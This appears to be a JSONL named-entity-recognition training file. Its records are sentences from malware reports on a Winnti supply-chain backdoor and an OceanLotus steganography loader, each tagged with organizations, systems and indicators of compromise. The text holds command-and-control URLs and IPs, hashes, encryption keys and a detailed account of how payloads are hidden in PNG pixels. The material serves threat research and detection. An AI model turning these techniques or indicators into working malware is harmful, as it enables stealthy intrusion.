{"text": "It includes an RC4 key ( which is XORed with 0x37 ) that is used to decrypt a filename and the embedded DLL file .", "spans": {"System: RC4 key": [[15, 22]], "System: XORed with 0x37": [[34, 49]], "System: DLL": [[104, 107]]}, "info": {"id": "aptner_train_000706", "source": "aptner_train"}}
{"text": "The actual malicious payload is quite small and only contains about 17 KB of code and data .", "spans": {}, "info": {"id": "aptner_train_000707", "source": "aptner_train"}}
{"text": "The configuration data is simply a whitespace-separated list of strings .", "spans": {}, "info": {"id": "aptner_train_000708", "source": "aptner_train"}}
{"text": "The configuration consists of four fields :", "spans": {}, "info": {"id": "aptner_train_000709", "source": "aptner_train"}}
{"text": "C&C server URL .", "spans": {}, "info": {"id": "aptner_train_000710", "source": "aptner_train"}}
{"text": "Variable ( t ) used to determine the time to sleep in milliseconds before continuing the execution .", "spans": {}, "info": {"id": "aptner_train_000711", "source": "aptner_train"}}
{"text": "Wait time is chosen randomly in the range 2/3 t to 5/3 t .", "spans": {}, "info": {"id": "aptner_train_000712", "source": "aptner_train"}}
{"text": "A string identifying a campaign .", "spans": {}, "info": {"id": "aptner_train_000713", "source": "aptner_train"}}
{"text": "A semicolon-separated list of executable filenames .", "spans": {}, "info": {"id": "aptner_train_000714", "source": "aptner_train"}}
{"text": "If any of them are running , the backdoor stops its execution .", "spans": {}, "info": {"id": "aptner_train_000715", "source": "aptner_train"}}
{"text": "ESET researchers have identified five versions of the payload :", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "aptner_train_000716", "source": "aptner_train"}}
{"text": "Winnti : a045939f 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php": [[38, 101]]}, "info": {"id": "aptner_train_000717", "source": "aptner_train"}}
{"text": "Winnti : a260dcf1 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php": [[38, 104]]}, "info": {"id": "aptner_train_000718", "source": "aptner_train"}}
{"text": "Winnti : dde82093 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/common.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[38, 96]]}, "info": {"id": "aptner_train_000719", "source": "aptner_train"}}
{"text": "Winnti : 44260a1d 2018-08-15 10:59:09 https://dump.gxxservice.com/common/up/up_base.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://dump.gxxservice.com/common/up/up_base.php": [[38, 87]]}, "info": {"id": "aptner_train_000720", "source": "aptner_train"}}
{"text": "Winnti : 8272c1f4 2018-11-01 13:16:24 https://nw.infestexe.com/version/last.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://nw.infestexe.com/version/last.php": [[38, 79]]}, "info": {"id": "aptner_train_000721", "source": "aptner_train"}}
{"text": "In the first three variants , the code was not recompiled , but the configuration data was edited in the DLL file itself .", "spans": {"System: DLL": [[105, 108]]}, "info": {"id": "aptner_train_000722", "source": "aptner_train"}}
{"text": "The rest of the content is a byte for byte copy .", "spans": {}, "info": {"id": "aptner_train_000723", "source": "aptner_train"}}
{"text": "Domain names were carefully chosen to look like they are related to the game or application publisher .", "spans": {}, "info": {"id": "aptner_train_000724", "source": "aptner_train"}}
{"text": "The apex domain was set to redirect to a relevant legitimate site using the Namecheap redirection service , while the subdomain points to the malicious C&C server .", "spans": {"System: Namecheap": [[76, 85]]}, "info": {"id": "aptner_train_000725", "source": "aptner_train"}}
{"text": "Winnti : xigncodeservice.com 2018-07-10 09:18:17 https://namu.wiki/w/XIGNCODE .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: xigncodeservice.com": [[9, 28]], "Indicator: https://namu.wiki/w/XIGNCODE": [[49, 77]]}, "info": {"id": "aptner_train_000726", "source": "aptner_train"}}
{"text": "Winnti : gxxservice.com 2018-08-14 13:53:41 None or unknown .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: gxxservice.com": [[9, 23]]}, "info": {"id": "aptner_train_000727", "source": "aptner_train"}}
{"text": "Winnti : infestexe.com 2018-11-07 08:46:44 https://www.facebook.com/infest.in.th .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: infestexe.com": [[9, 22]], "Indicator: https://www.facebook.com/infest.in.th": [[43, 80]]}, "info": {"id": "aptner_train_000728", "source": "aptner_train"}}
{"text": "Winnti : bugcheck.xigncodeservice.com 167.99.106.49 , 178.128.180.206 DigitalOcean .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: bugcheck.xigncodeservice.com": [[9, 37]], "Indicator: 167.99.106.49": [[38, 51]], "Indicator: 178.128.180.206": [[54, 69]], "Organization: DigitalOcean": [[70, 82]]}, "info": {"id": "aptner_train_000729", "source": "aptner_train"}}
{"text": "Winnti : dump.gxxservice.com 142.93.204.230 DigitalOcean .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: dump.gxxservice.com": [[9, 28]], "Indicator: 142.93.204.230": [[29, 43]], "Organization: DigitalOcean": [[44, 56]]}, "info": {"id": "aptner_train_000730", "source": "aptner_train"}}
{"text": "Winnti : nw.infestexe.com 138.68.14.195 DigitalOcean .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: nw.infestexe.com": [[9, 25]], "Indicator: 138.68.14.195": [[26, 39]], "Organization: DigitalOcean": [[40, 52]]}, "info": {"id": "aptner_train_000731", "source": "aptner_train"}}
{"text": "At the time of writing , none of the domains resolve and the C&C servers are not responding .", "spans": {}, "info": {"id": "aptner_train_000732", "source": "aptner_train"}}
{"text": "A bot identifier is generated from the machine’s MAC address .", "spans": {}, "info": {"id": "aptner_train_000733", "source": "aptner_train"}}
{"text": "The backdoor reports information about the machine such as the user name , computer name , Windows version and system language to the C&C server and awaits commands .", "spans": {"System: Windows": [[91, 98]]}, "info": {"id": "aptner_train_000734", "source": "aptner_train"}}
{"text": "The data is XOR encrypted with the key “ *&b0i0rong2Y7un1 ” and base64-encoded .", "spans": {"System: XOR": [[12, 15]]}, "info": {"id": "aptner_train_000735", "source": "aptner_train"}}
{"text": "The data received from the C&C server is encrypted using the same key .", "spans": {}, "info": {"id": "aptner_train_000736", "source": "aptner_train"}}
{"text": "This simple backdoor has only four commands that can be used by the attacker :", "spans": {}, "info": {"id": "aptner_train_000737", "source": "aptner_train"}}
{"text": "DownUrlFile DownRunUrlFile RunUrlBinInMem UnInstall .", "spans": {}, "info": {"id": "aptner_train_000738", "source": "aptner_train"}}
{"text": "The commands are pretty much self-explanatory .", "spans": {}, "info": {"id": "aptner_train_000739", "source": "aptner_train"}}
{"text": "They allow the attacker to run additional executables from a given URL .", "spans": {}, "info": {"id": "aptner_train_000740", "source": "aptner_train"}}
{"text": "The last one is perhaps less obvious .", "spans": {}, "info": {"id": "aptner_train_000741", "source": "aptner_train"}}
{"text": "The UnInstall command doesn’t remove the malware from the system .", "spans": {}, "info": {"id": "aptner_train_000742", "source": "aptner_train"}}
{"text": "After all , it is embedded inside a legitimate executable that still needs to run .", "spans": {}, "info": {"id": "aptner_train_000743", "source": "aptner_train"}}
{"text": "Rather than removing anything , it disables the malicious code by setting the following registry value to 1: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImageFlag .", "spans": {}, "info": {"id": "aptner_train_000744", "source": "aptner_train"}}
{"text": "When the payload is started , the registry value is queried and execution is aborted if set .", "spans": {}, "info": {"id": "aptner_train_000745", "source": "aptner_train"}}
{"text": "Perhaps the attackers are trying to reduce the load from their C&C servers by avoiding callbacks from uninteresting victims .", "spans": {}, "info": {"id": "aptner_train_000746", "source": "aptner_train"}}
{"text": "Based on ESET telemetry , one of the second stage payload delivered to victims is Win64/Winnti.BN .", "spans": {"Organization: ESET": [[9, 13]], "Indicator: Win64/Winnti.BN": [[82, 97]]}, "info": {"id": "aptner_train_000747", "source": "aptner_train"}}
{"text": "As far as we can tell , its dropper was downloaded over HTTPS from api.goallbandungtravel.com .", "spans": {"Indicator: api.goallbandungtravel.com": [[67, 93]]}, "info": {"id": "aptner_train_000748", "source": "aptner_train"}}
{"text": "We have seen it installed as a Windows service and as a DLL in C:\\Windows\\System32 using the following file names :", "spans": {"System: Windows": [[31, 38]], "System: DLL": [[56, 59]]}, "info": {"id": "aptner_train_000749", "source": "aptner_train"}}
{"text": "cscsrv.dll dwmsvc.dll iassrv.dll mprsvc.dll nlasrv.dll powfsvc.dll racsvc.dll slcsvc.dll snmpsvc.dll sspisvc.dll .", "spans": {"Indicator: cscsrv.dll": [[0, 10]], "Indicator: dwmsvc.dll": [[11, 21]], "Indicator: iassrv.dll": [[22, 32]], "Indicator: mprsvc.dll": [[33, 43]], "Indicator: nlasrv.dll": [[44, 54]], "Indicator: powfsvc.dll": [[55, 66]], "Indicator: racsvc.dll": [[67, 77]], "Indicator: slcsvc.dll": [[78, 88]], "Indicator: snmpsvc.dll": [[89, 100]], "Indicator: sspisvc.dll": [[101, 112]]}, "info": {"id": "aptner_train_000750", "source": "aptner_train"}}
{"text": "The samples we have analyzed were actually quite large , each of them about 60 MB .", "spans": {}, "info": {"id": "aptner_train_000751", "source": "aptner_train"}}
{"text": "This is , however , only for appearance because the real size or the PE file is between 63 KB and 72 KB , depending on the version .", "spans": {}, "info": {"id": "aptner_train_000752", "source": "aptner_train"}}
{"text": "The malware files simply have lots of clean files appended to them .", "spans": {}, "info": {"id": "aptner_train_000753", "source": "aptner_train"}}
{"text": "This is probably done by the component that drops and installs this malicious service .", "spans": {}, "info": {"id": "aptner_train_000754", "source": "aptner_train"}}
{"text": "Once the service runs , it appends the extension .mui to its DLL path , reads that file and decrypts it using RC5 .", "spans": {"System: DLL": [[61, 64]], "System: RC5": [[110, 113]]}, "info": {"id": "aptner_train_000755", "source": "aptner_train"}}
{"text": "The decrypted MUI file contains position-independent code at offset 0 .", "spans": {}, "info": {"id": "aptner_train_000756", "source": "aptner_train"}}
{"text": "The RC5 key is derived from the hard drive serial number and the string “ f@Ukd!rCto R$. ” — we were not able to obtain any MUI files nor the code that installs them in the first place .", "spans": {"System: RC5": [[4, 7]]}, "info": {"id": "aptner_train_000757", "source": "aptner_train"}}
{"text": "Thus , we do not know the exact purpose of this malicious service .", "spans": {}, "info": {"id": "aptner_train_000758", "source": "aptner_train"}}
{"text": "Recent versions of the malware include an “ auto-update ” mechanism , using C&C server http://checkin.travelsanignacio.com .", "spans": {"Indicator: http://checkin.travelsanignacio.com": [[87, 122]]}, "info": {"id": "aptner_train_000759", "source": "aptner_train"}}
{"text": "That C&C server served the latest version of the MUI files encrypted with a static RC5 key .", "spans": {"System: RC5": [[83, 86]]}, "info": {"id": "aptner_train_000760", "source": "aptner_train"}}
{"text": "The C&C server was not responding during our analysis .", "spans": {}, "info": {"id": "aptner_train_000761", "source": "aptner_train"}}
{"text": "Let’s start with who is not targeted .", "spans": {}, "info": {"id": "aptner_train_000762", "source": "aptner_train"}}
{"text": "Early in the payload , the malware checks to see if the system language is Russian or Chinese .", "spans": {}, "info": {"id": "aptner_train_000763", "source": "aptner_train"}}
{"text": "In either case , the malware stops running .", "spans": {}, "info": {"id": "aptner_train_000764", "source": "aptner_train"}}
{"text": "There is no way around this : the attackers are simply not interested in computers configured with those languages .", "spans": {}, "info": {"id": "aptner_train_000765", "source": "aptner_train"}}
{"text": "ESET telemetry shows victims are mostly located in Asia , with Thailand having the largest part of the pie .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "aptner_train_000766", "source": "aptner_train"}}
{"text": "Given the popularity of the compromised application that is still being distributed by its developer , it wouldn’t be surprising if the number of victims is in the tens or hundreds of thousands .", "spans": {}, "info": {"id": "aptner_train_000767", "source": "aptner_train"}}
{"text": "Supply-chain attacks are hard to detect from the consumer perspective .", "spans": {}, "info": {"id": "aptner_train_000768", "source": "aptner_train"}}
{"text": "It is impossible to start analyzing every piece of software we run , especially with all the regular updates we are encouraged or required to install .", "spans": {}, "info": {"id": "aptner_train_000769", "source": "aptner_train"}}
{"text": "So , we put our trust in software vendors that the files they distribute don’t include malware .", "spans": {}, "info": {"id": "aptner_train_000770", "source": "aptner_train"}}
{"text": "Perhaps that’s the reason multiple groups target software developers : compromising the vendor results in a botnet as popular as the software that is hacked .", "spans": {}, "info": {"id": "aptner_train_000771", "source": "aptner_train"}}
{"text": "However , there is a downside of using such a technique : once the scheme is uncovered , the attacker loses control and computers can be cleaned through regular updates .", "spans": {}, "info": {"id": "aptner_train_000772", "source": "aptner_train"}}
{"text": "We do not know the motives of the attackers at this point .", "spans": {}, "info": {"id": "aptner_train_000773", "source": "aptner_train"}}
{"text": "Is it simply financial gain? Are there any reasons why the three affected products are from Asian developers and for the Asian market? Do these attackers use a botnet as part of a larger espionage operation? ESET products detect this threat as Win32/HackedApp.Winnti.A , Win32/HackedApp.Winnti.B , the payload as Win32/Winnti.AG , and the second stage as Win64/Winnti.BN .", "spans": {"Organization: ESET": [[208, 212]], "Indicator: Win32/HackedApp.Winnti.A": [[244, 268]], "Indicator: Win32/HackedApp.Winnti.B": [[271, 295]], "Indicator: Win32/Winnti.AG": [[313, 328]], "Indicator: Win64/Winnti.BN": [[355, 370]]}, "info": {"id": "aptner_train_000774", "source": "aptner_train"}}
{"text": "Compromised file samples ( Win32/HackedApp.Winnti.A and B )", "spans": {"Indicator: Win32/HackedApp.Winnti.A and B": [[27, 57]]}, "info": {"id": "aptner_train_000775", "source": "aptner_train"}}
{"text": "Winnti : 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b Tue Nov 13 10:12:58 2018 1729131071 8272c1f4 .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b": [[9, 49]]}, "info": {"id": "aptner_train_000776", "source": "aptner_train"}}
{"text": "Winnti : 7f73def251fcc34cbd6f5ac61822913479124a2a Wed Nov 14 03:50:18 2018 19317120 44260a1d .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 7f73def251fcc34cbd6f5ac61822913479124a2a": [[9, 49]]}, "info": {"id": "aptner_train_000777", "source": "aptner_train"}}
{"text": "Winnti : dac0bd8972f23c9b5f7f8f06c5d629eac7926269 Tue Nov 27 03:05:16 2018 1729131071 8272c1f4 .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: dac0bd8972f23c9b5f7f8f06c5d629eac7926269": [[9, 49]]}, "info": {"id": "aptner_train_000778", "source": "aptner_train"}}
{"text": "Some hashes were redacted per request from one of the vendor .", "spans": {}, "info": {"id": "aptner_train_000779", "source": "aptner_train"}}
{"text": "If for a particular reason you need them , reach out to us at threatintel@eset.com .", "spans": {}, "info": {"id": "aptner_train_000780", "source": "aptner_train"}}
{"text": "Payload Samples ( Win32/Winnti.AG )", "spans": {"Indicator: Win32/Winnti.AG": [[18, 33]]}, "info": {"id": "aptner_train_000781", "source": "aptner_train"}}
{"text": "Winnti : a045939f53c5ad2c0f7368b082aa7b0bd7b116da https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: a045939f53c5ad2c0f7368b082aa7b0bd7b116da": [[9, 49]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php": [[50, 113]]}, "info": {"id": "aptner_train_000782", "source": "aptner_train"}}
{"text": "Winnti : a260dcf193e747cee49ae83568eea6c04bf93cb3 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: a260dcf193e747cee49ae83568eea6c04bf93cb3": [[9, 49]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php": [[50, 116]]}, "info": {"id": "aptner_train_000783", "source": "aptner_train"}}
{"text": "Winnti : dde82093decde6371eb852a5e9a1aa4acf3b56ba https://bugcheck.xigncodeservice.com/Common/Lib/common.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: dde82093decde6371eb852a5e9a1aa4acf3b56ba": [[9, 49]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[50, 108]]}, "info": {"id": "aptner_train_000784", "source": "aptner_train"}}
{"text": "Winnti : 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f https://nw.infestexe.com/version/last.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f": [[9, 49]], "Indicator: https://nw.infestexe.com/version/last.php": [[50, 91]]}, "info": {"id": "aptner_train_000785", "source": "aptner_train"}}
{"text": "Winnti : 44260a1dfd92922a621124640015160e621f32d5 https://dump.gxxservice.com/common/up/up_base.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 44260a1dfd92922a621124640015160e621f32d5": [[9, 49]], "Indicator: https://dump.gxxservice.com/common/up/up_base.php": [[50, 99]]}, "info": {"id": "aptner_train_000786", "source": "aptner_train"}}
{"text": "Second stage samples ( Win64/Winnti.BN )", "spans": {"Indicator: Win64/Winnti.BN": [[23, 38]]}, "info": {"id": "aptner_train_000787", "source": "aptner_train"}}
{"text": "Winnti : Dropper delivered by api.goallbandungtravel.com .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: api.goallbandungtravel.com": [[30, 56]]}, "info": {"id": "aptner_train_000788", "source": "aptner_train"}}
{"text": "Winnti : 4256fa6f6a39add6a1fa10ef1497a74088f12be0 2018-07-25 10:13:41 None .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 4256fa6f6a39add6a1fa10ef1497a74088f12be0": [[9, 49]]}, "info": {"id": "aptner_train_000789", "source": "aptner_train"}}
{"text": "Winnti : bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 2018-10-10 09:57:31 http://checkin.travelsanignacio.com .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81": [[9, 49]], "Indicator: http://checkin.travelsanignacio.com": [[70, 105]]}, "info": {"id": "aptner_train_000790", "source": "aptner_train"}}
{"text": "Winnti : T1195 Supply Chain Compromise .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000791", "source": "aptner_train"}}
{"text": "Winnti : T1050 New Service .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000792", "source": "aptner_train"}}
{"text": "Winnti : T1022 Data Encrypted .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000793", "source": "aptner_train"}}
{"text": "Winnti : T1079 Multilayer Encryption .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000794", "source": "aptner_train"}}
{"text": "Winnti : T1032 Standard Cryptographic Protocol ( RC4 , RC5 ) .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000795", "source": "aptner_train"}}
{"text": "Winnti : T1043 Commonly Used Port ( 80 , 443 ) .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000796", "source": "aptner_train"}}
{"text": "OceanLotus Steganography Malware Analysis White Paper .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000797", "source": "aptner_train"}}
{"text": "While continuing to monitor activity of the OceanLotus APT Group , BlackBerry Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file .", "spans": {"Organization: OceanLotus": [[44, 54]], "Organization: BlackBerry Cylance": [[67, 85]]}, "info": {"id": "aptner_train_000798", "source": "aptner_train"}}
{"text": "The steganography algorithm appears to be bespoke and utilizes a least significant bit approach to minimize visual differences when compared with the original image to prevent analysis by discovery tools .", "spans": {}, "info": {"id": "aptner_train_000799", "source": "aptner_train"}}
{"text": "Once decoded , decrypted , and executed , an obfuscated loader will load one of the APT32 backdoors .", "spans": {"Organization: APT32": [[84, 89]]}, "info": {"id": "aptner_train_000800", "source": "aptner_train"}}
{"text": "Thus far , BlackBerry Cylance has observed two backdoors being used in combination with the steganography loader – a version of Denes backdoor ( bearing similarities to the one described by ESET ) , and an updated version of Remy backdoor .", "spans": {"Organization: BlackBerry Cylance": [[11, 29]], "Malware: Denes backdoor": [[128, 142]], "Organization: ESET": [[190, 194]], "Malware: Remy backdoor": [[225, 238]]}, "info": {"id": "aptner_train_000801", "source": "aptner_train"}}
{"text": "However , this can be easily modified by the threat actor to deliver other malicious payloads .", "spans": {}, "info": {"id": "aptner_train_000802", "source": "aptner_train"}}
{"text": "The complexity of the shellcode and loaders shows the group continues to invest heavily in development of bespoke tooling .", "spans": {}, "info": {"id": "aptner_train_000803", "source": "aptner_train"}}
{"text": "This white paper describes the steganography algorithm used in two distinct loader variants and looks at the launcher of the backdoor that was encoded in one of the .png cover images . mcvsocfg.dll :", "spans": {"Indicator: mcvsocfg.dll": [[185, 197]]}, "info": {"id": "aptner_train_000804", "source": "aptner_train"}}
{"text": "ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Malware/Backdoor 659 KB ( 674 , 816 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 .", "spans": {"Indicator: ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4": [[0, 64]], "System: Windows": [[132, 139]], "System: DLL": [[142, 145]], "Organization: Intel": [[160, 165]]}, "info": {"id": "aptner_train_000805", "source": "aptner_train"}}
{"text": "This particular OceanLotus malware loader attempts to imitate McAfee ’s McVsoCfg DLL and expects to be side-loaded by the legitimate \" On Demand Scanner \" executable .", "spans": {"Organization: OceanLotus": [[16, 26]], "System: McVsoCfg DLL": [[72, 84]]}, "info": {"id": "aptner_train_000806", "source": "aptner_train"}}
{"text": "It arrives together with an encrypted payload stored in a separate .png image file .", "spans": {}, "info": {"id": "aptner_train_000807", "source": "aptner_train"}}
{"text": "The .png cover file is actually a valid image file that is not malicious on its own .", "spans": {}, "info": {"id": "aptner_train_000808", "source": "aptner_train"}}
{"text": "The payload is encoded inside this image with the use of a technique called steganography , which utilizes the least significant bits of each pixel’s color code to store hidden information , without making overtly visible changes to the picture itself .", "spans": {}, "info": {"id": "aptner_train_000809", "source": "aptner_train"}}
{"text": "The encoded payload is additionally encrypted with AES128 and further obfuscated with XOR in an attempt to fool steganography detection tools .", "spans": {"System: XOR": [[86, 89]]}, "info": {"id": "aptner_train_000810", "source": "aptner_train"}}
{"text": "Features :", "spans": {}, "info": {"id": "aptner_train_000811", "source": "aptner_train"}}
{"text": "Side-loaded DLL Loads next-stage payload using custom .png steganography Uses AES128 implementation from Crypto++ library for payload decryption Known to load Denes backdoor , might possibly be used also with other payloads .", "spans": {"System: DLL": [[12, 15]], "System: custom .png steganography": [[47, 72]], "System: Crypto++ library": [[105, 121]], "Malware: Denes backdoor": [[159, 173]]}, "info": {"id": "aptner_train_000812", "source": "aptner_train"}}
{"text": "The malicious DLL exports the same function names as the original mcvsocfg.dll library .", "spans": {"System: DLL": [[14, 17]], "Indicator: mcvsocfg.dll": [[66, 78]]}, "info": {"id": "aptner_train_000813", "source": "aptner_train"}}
{"text": "All exports contain the exact same code which will decrypt the payload , inject it into memory , and execute it .", "spans": {}, "info": {"id": "aptner_train_000814", "source": "aptner_train"}}
{"text": "The payload is encoded inside a separate .png file using a technique called steganography .", "spans": {}, "info": {"id": "aptner_train_000815", "source": "aptner_train"}}
{"text": "On top of that , the decoded payload is also encrypted with AES-128 and finally obfuscated with XOR 0x3B .", "spans": {}, "info": {"id": "aptner_train_000816", "source": "aptner_train"}}
{"text": "It’s worth noting that the XOR key is not hardcoded , but instead is read from the first byte of the C:\\Windows\\system.ini file .", "spans": {"System: XOR": [[27, 30]], "Indicator: C:\\Windows\\system.ini": [[101, 122]]}, "info": {"id": "aptner_train_000817", "source": "aptner_train"}}
{"text": "One of the payloads we encountered was encoded inside an image of Kaito Kuroba1 , the gentleman thief character from a popular Japanese manga series .", "spans": {}, "info": {"id": "aptner_train_000818", "source": "aptner_train"}}
{"text": "To extract the payload , the malware will first initialize the GDI+ API and get the image width and height values .", "spans": {}, "info": {"id": "aptner_train_000819", "source": "aptner_train"}}
{"text": "The size of the payload is encoded within the first four pixels of the image .", "spans": {}, "info": {"id": "aptner_train_000820", "source": "aptner_train"}}
{"text": "After obtaining the size , the malware will allocate an appropriate memory buffer and proceed to decode the remaining payload byte by byte .", "spans": {}, "info": {"id": "aptner_train_000821", "source": "aptner_train"}}
{"text": "The payload is encoded in the same way as the size – each byte of the payload is computed from the ARGB color codes of each subsequent pixel in the image .", "spans": {}, "info": {"id": "aptner_train_000822", "source": "aptner_train"}}
{"text": "In case the payload is bigger than the image used to store it , the remaining payload bytes are simply attached to the image after its IEND marker , and read directly from the file .", "spans": {}, "info": {"id": "aptner_train_000823", "source": "aptner_train"}}
{"text": "The pixel encoding algorithm is fairly straightforward and aims to minimize visual differences when compared to the original image by only modifying the least significant bits of the red , green , and blue color byte values .", "spans": {}, "info": {"id": "aptner_train_000824", "source": "aptner_train"}}
{"text": "The alpha channel byte remains unchanged .", "spans": {}, "info": {"id": "aptner_train_000825", "source": "aptner_train"}}
{"text": "To encode a byte of the payload , the first three bits ( 0-2 ) are stored in the red color , the next three bits ( 3-5 ) are stored in the green color , and the final two bits ( 6-7 ) are stored in the blue color .", "spans": {}, "info": {"id": "aptner_train_000826", "source": "aptner_train"}}
{"text": "Decoding is a simple inverse operation .", "spans": {}, "info": {"id": "aptner_train_000827", "source": "aptner_train"}}
{"text": "Windows converts the .png pixel RGBA value to an ARGB encoding via the GdpiBitmapGetPixel API .", "spans": {"System: Windows": [[0, 7]], "System: GdpiBitmapGetPixel API": [[71, 93]]}, "info": {"id": "aptner_train_000828", "source": "aptner_train"}}
{"text": "To aid in the recovery of encrypted payloads , the following Python script can be used to decode pixel colors from a .png image .", "spans": {"System: Python script": [[61, 74]]}, "info": {"id": "aptner_train_000829", "source": "aptner_train"}}
{"text": "After decoding the .png image , the loader then proceeds to initialize the key and IV used to perform AES decryption of the encrypted payload .", "spans": {}, "info": {"id": "aptner_train_000830", "source": "aptner_train"}}
{"text": "Both values are supplied from an array of 256 pseudo-random bytes hardcoded in the binary’s .rdata section .", "spans": {}, "info": {"id": "aptner_train_000831", "source": "aptner_train"}}
{"text": "The first two bytes of that array specify the relative offsets to the key and IV respectively .", "spans": {}, "info": {"id": "aptner_train_000832", "source": "aptner_train"}}
{"text": "The loader uses the AES128 implementation from the open-source Crypto++2 library .", "spans": {"System: Crypto++2 library": [[63, 80]]}, "info": {"id": "aptner_train_000833", "source": "aptner_train"}}
{"text": "We were able to correlate most of the disassembly to the corresponding functions from the Crypto++ github source , and it doesn’t appear that the malware authors have modified much of the original code .", "spans": {"System: Crypto++": [[90, 98]]}, "info": {"id": "aptner_train_000834", "source": "aptner_train"}}
{"text": "A SimpleKeyringInterface class is used to initialize the key , while the IV is passed to the SetCipherWithIV function .", "spans": {"System: SimpleKeyringInterface": [[2, 24]], "System: SetCipherWithIV": [[93, 108]]}, "info": {"id": "aptner_train_000835", "source": "aptner_train"}}
{"text": "The decryption is performed with the use of the StreamTransformationFilter class with the StreamTransformation cipher set to AES CBC decryption mode .", "spans": {"System: StreamTransformationFilter": [[48, 74]], "System: StreamTransformation": [[90, 110]]}, "info": {"id": "aptner_train_000836", "source": "aptner_train"}}
{"text": "The library code performs numerous checks for the CPU features , and based on the outcome , it will choose a processor-specific implementation of the cryptographic function .", "spans": {}, "info": {"id": "aptner_train_000837", "source": "aptner_train"}}
{"text": "One of the AES implementations makes use of the Intel AES-NI encryption instruction set which is supported by several modern Intel and AMD CPUs .", "spans": {"Organization: Intel": [[48, 53], [125, 130]], "System: AES-NI": [[54, 60]], "Organization: AMD": [[135, 138]]}, "info": {"id": "aptner_train_000838", "source": "aptner_train"}}
{"text": "The decrypted payload undergoes one final transformation , where it is XORed with the first byte read from the C:\\Windows\\system . ini file , which is expected to begin with a comment character \" ; \" ( 0x3B ) .", "spans": {}, "info": {"id": "aptner_train_000839", "source": "aptner_train"}}
{"text": "Performing the same steps in CyberChef , it is possible to decode the encrypted payload , which should yield x86 shellcode , starting with a call immediate opcode sequence .", "spans": {"System: CyberChef": [[29, 38]]}, "info": {"id": "aptner_train_000840", "source": "aptner_train"}}
{"text": "Varies :", "spans": {"Malware: Varies": [[0, 6]]}, "info": {"id": "aptner_train_000841", "source": "aptner_train"}}
{"text": "4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Malware/Backdoor 658 KB ( 674 , 304 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 .", "spans": {"Indicator: 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d": [[0, 64]], "System: Windows": [[132, 139]], "System: DLL": [[142, 145]], "Organization: Intel": [[160, 165]]}, "info": {"id": "aptner_train_000842", "source": "aptner_train"}}
{"text": "While this loader differs somewhat in general implementation , the payload extraction routine seems to be the same as in the previous variant .", "spans": {}, "info": {"id": "aptner_train_000843", "source": "aptner_train"}}
{"text": "The main differences are :", "spans": {}, "info": {"id": "aptner_train_000844", "source": "aptner_train"}}
{"text": "The way the decryption routine is called ( from within the DllMain function , as opposed to an exported function ) .", "spans": {"System: DllMain": [[59, 66]]}, "info": {"id": "aptner_train_000845", "source": "aptner_train"}}
{"text": "The way the payload is invoked ( by overwriting the return address on the stack , as opposed to a direct call ) .", "spans": {}, "info": {"id": "aptner_train_000846", "source": "aptner_train"}}
